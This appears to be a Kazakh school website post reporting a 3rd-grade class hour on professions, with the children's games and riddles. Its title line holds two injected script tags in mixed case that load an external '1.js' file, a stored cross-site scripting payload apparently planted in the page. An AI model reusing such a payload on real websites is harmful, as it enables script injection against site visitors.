«Мамандыққа бастар жол мектептен басталады» сынып сағаты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
22.02.2022
2022 жылдың 21 ақпанында 3-сыныпта "Мамандыққа жол мектептен басталады" тақырыбында сынып сағаты өтті. Бұл сынып сағатының мақсаты: оқушылардың мамандықтар туралы білім деңгейін анықтау, балалардың мамандықтар туралы түсініктерін кеңейту, әртүрлі мамандықтағы адамдарға құрметпен және мейірімділікпен қарауға тәрбиелеу, еңбексүйгіштікке тәрбиелеу. Сынып сағаты барысында балалар жұмбақтар, ребустар шешіп,мамандықтар туралы мақал-мәтелдердің мағынасын талдады. Өлеңдер оқуға белсене қатысты. "Жұпты тап" ,"Мамандықтарды ата", “Кәсіби Әліппе", "Мақалды аяқта"ойындары өткізілді. Қорытындылай келе, балалар парақшаларға өздері армандаған кәсіптің атын жазды.
Просмотров: 583